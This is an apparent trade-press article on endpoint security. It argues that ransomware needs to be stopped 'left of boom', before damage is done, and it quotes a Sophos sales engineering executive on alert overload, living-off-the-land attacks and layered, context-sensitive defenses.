Ransomware, Endpoint/Device Security
Endpoint security challenge: Stopping ransomware attacks ‘left of boom’

(Stock Photo, Getty Images)
In his memoir “Left of Boom”, former CIA case officer Douglas Laux details his experiences in Afghanistan and the Middle East, and the title of his book refers to the U.S. military’s decades-old efforts to disrupt insurgent cells before they could build or plant bombs. The phrase is also widely used by law enforcement and first responders when discussing the disruption of terror cells and attacks before they occur. The phrase has a lot of utility in the world of cybersecurity, too.Consider the concept of Left of Boom in terms of endpoint security. Endpoint security tools are vigilant at monitoring endpoint activity and can generate alerts when they detect suspicious behavior, but they also operate very narrowly. They may be overzealous in reporting anything that violates those parameters, leading to high rates of false positives, but they also might fail to notice when adversaries use a company’s legitimate tools against itself -- what’s known as “living off the land”.This overwhelms security teams with so many alerts that they get buried chasing the false positives while real threats sneak on through. Security analysts need more high-fidelity alerts and less noise.Further, because security teams are already strained, they need more help stopping attacks as they are underway. “With this next generation of endpoints, what we’ve seen is that there’s a greater concentration on observation of the [threat] techniques, but not really stopping the threat itself,” said Matt Hickey, vice president of sales engineering at Sophos. “What we need to do is a layered approach on these devices where we are doing device control and we're making sure that only critical applications needed for that user are running on that device.”Most importantly, he said, security teams need tools that stop cyberthreats “left of boom.”However, finding and eliminating cyberattacks left of boom requires proactive measures that are capable of disrupting the attacker before they, or their malware, can do any damage. Bonus points if this can be achieved before the adversary can build a persistent presence in the environment. To achieve all of this, Hickey recommends a context-sensitive endpoint defense.
An In-Depth Guide to Ransomware
Get essential knowledge and practical strategies to protect your organization from ransomware attacks.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds